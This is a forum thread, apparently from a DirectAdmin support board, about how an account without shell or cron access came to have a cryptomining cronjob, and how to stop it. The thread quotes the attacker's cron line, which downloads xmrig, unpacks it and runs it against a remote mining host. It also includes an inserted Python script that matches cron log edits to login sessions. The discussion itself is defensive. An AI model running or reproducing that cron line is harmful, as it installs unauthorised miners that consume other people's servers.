User created cronjob without cronjob and shell access

ehsanch (Verified User, joined Jun 2, 2008, 46 messages)
A user (with a hacked website) created the following cronjob:
Code:
*/15 * * * * if ! pgrep -x 'xmrig'; then mkdir -p ~/.tmp && cd ~/.tmp && wget -q https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz && tar -xf xmrig-6.20.0-linux-static-x64.tar.gz && cd xmrig-6.20.0 && nohup ./xmrig -o drsql.ooguy.com:443 --user shell & f

This code apparently mines a cryptocurrency and occupies server resources.
The intended user does not have access to cron jobs, and this cronjob was probably created without direct admin access.
User cgi-bin is disabled and PHP shell functions are disabled:
Shell Access (SSH) : Disabled
CGI-Bin : Disabled
Git : Disabled
Nginx Unit : Disabled
PHP : Enabled

disable_functions = exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname

Server : CentOS Linux release 7.9.2009 (Core)
Version 1.654
DA build for OS linux_amd64
Detected server OS rhel7_amd64


How was this possible, and how can this type of attack be prevented on a DirectAdmin server?

You can try Process Tracking in CSF. Or you can suspend this account a few times for a few days, so the client will not spend money on hosting where he can't get it back with cryptomining.

I want to know how the user created the cronjob!
In general, the fact that a user can create a cron job without having access to cron jobs in DA, and that he can execute any system command in the cronjob, is a big security risk that must be controlled.
So there are two concerns:
1- prevent the user from adding cronjobs
2- limit the commands that the user can run in a cronjob (prevent running /bin/bash, /bin/sh, nohup and so on, or just allow php!)

Maybe the user has SSH access and added the cron via console? Check the logs.

The user has no SSH access, but I found an entry in the "last" command output without an IP:
Code:
username pts/0                         Sat Oct 28 18:26 - 18:28  (00:02)
and at this time a cronjob was created for this user (cron log):
Code:
Oct 28 18:28:23 server23 crontab[14769]: (username) REPLACE (username)

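The correlation done by hand above (a crontab REPLACE in the cron log matched against the login session `last` shows for the same user) can be automated. This is an added example, not code from the thread or from DirectAdmin; the log lines are constructed to mirror the ones quoted, the year and the list of no-shell accounts are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample input modelled on the lines quoted in the thread
# (/var/log/cron and the output of `last`); not real server data.
CRON_LOG = """\
Oct 28 18:28:23 server23 crontab[14769]: (username) REPLACE (username)
Oct 28 18:30:01 server23 CROND[14801]: (root) CMD (run-parts /etc/cron.hourly)
Oct 28 19:02:10 server23 crontab[15110]: (admin) REPLACE (admin)
"""
LAST_OUTPUT = """\
username pts/0                         Sat Oct 28 18:26 - 18:28  (00:02)
admin    pts/1        203.0.113.5      Sat Oct 28 19:00 - 19:45  (00:45)
"""
NO_SHELL_USERS = {"username"}  # accounts whose plan disables shell and cron (assumed list)
YEAR = 2023  # syslog and `last` lines carry no year; assumed for the sample

CRON_RE = re.compile(r"^(\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ crontab\[\d+\]: \((\S+)\) (REPLACE|EDIT) ")
LAST_RE = re.compile(r"^(\S+)\s+(pts/\d+|tty\S*)\s+(\S+)?\s+\w{3} (\w{3} +\d{1,2} \d\d:\d\d) - (\d\d:\d\d)")

def parse_cron_edits(log):
    """Yield (timestamp, user, action) for every crontab REPLACE/EDIT in the cron log."""
    for line in log.splitlines():
        m = CRON_RE.match(line)
        if m:
            yield datetime.strptime(f"{YEAR} {m[1]}", "%Y %b %d %H:%M:%S"), m[2], m[3]

def parse_sessions(last_out):
    """Yield (user, tty, host, start, end) from `last` output; host is None when the column is blank."""
    for line in last_out.splitlines():
        m = LAST_RE.match(line)
        if not m:
            continue
        user, tty, host, start, end = m.groups()
        start_dt = datetime.strptime(f"{YEAR} {start}", "%Y %b %d %H:%M")
        end_dt = start_dt.replace(hour=int(end[:2]), minute=int(end[3:]))
        if end_dt < start_dt:  # session crossed midnight
            end_dt += timedelta(days=1)
        yield user, tty, host, start_dt, end_dt

def suspicious_cron_edits(log, last_out, no_shell_users):
    """Report crontab changes by users who should have no cron access at all,
    each paired with the login session (if any) that was open at that moment."""
    sessions = list(parse_sessions(last_out))
    findings = []
    for ts, user, action in parse_cron_edits(log):
        if user not in no_shell_users:
            continue
        minute = ts.replace(second=0)  # `last` only has minute resolution
        open_sessions = [s for s in sessions if s[0] == user and s[3] <= minute <= s[4]]
        for _, tty, host, _, _ in open_sessions or [(user, None, None, None, None)]:
            # host None: `last` showed no remote address, so this was a local login
            # (e.g. su from another local account), not an SSH connection from outside.
            findings.append({"time": ts, "user": user, "action": action, "tty": tty, "host": host})
    return findings
```

A finding with a tty but no host is the pattern from this thread: the crontab was written from a local terminal session, so the next place to look is who else was logged in locally (or which panel process) at 18:26.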
So copy the link to the cronjob menu from an account that has this ability, log in to the disabled account and try to open the cron menu through the direct DA link. Maybe it just removes the menu item but still allows setting a cron if you have the link to it.